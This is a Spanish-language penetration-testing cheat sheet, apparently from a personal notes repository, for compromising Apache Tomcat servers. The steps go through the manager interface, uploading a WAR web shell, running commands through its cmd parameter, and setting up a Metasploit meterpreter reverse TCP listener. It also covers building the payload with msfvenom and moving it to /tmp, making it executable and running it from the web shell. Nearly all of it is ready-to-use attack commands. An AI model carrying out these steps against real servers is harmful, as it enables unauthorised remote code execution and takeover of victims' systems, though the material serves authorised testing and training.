# 80/TCP, 443/TCP (HTTP/S)

## Apache Tomcat

Ruta de "Tomcat web application manager".

```shell
http://<IP-address>:<port>/manager/
```

Subir web shell en formato `war`.

* <https://github.com/MrW0l05zyn/pentesting/blob/master/web/shells/web-shell.war>

```shell
http://<IP-address>:<port>/web-shell/
http://<IP-address>:<port>/web-shell/index.jsp?cmd=whoami
```

Configuración de listener en Metasploit.

```shell
use exploit/multi/handler
set payload linux/x64/meterpreter_reverse_tcp
set lhost <attacker-IP-address>
set lport <listen-port>
run
```

Generar y subir reverse shell `reverse-shell.war` en máquina victima desde "Tomcat web application manager".

```shell
msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=<attacker-IP-address> lport=<listen-port> -f elf -o reverse-shell.war
```

Desde la web shell mover reverse shell `reverse-shell.war` a directorio `tmp` y asignar privilegios de ejecución.

```shell
ls -la /var/lib/tomcat8/webapps
mv /var/lib/tomcat8/webapps/reverse-shell.war /tmp/reverse-shell
ls /tmp/reverse-shell
chmod +x /tmp/reverse-shell
```

Ejecutar desde la web shell la reverse shell.

```shell
/tmp/reverse-shell
```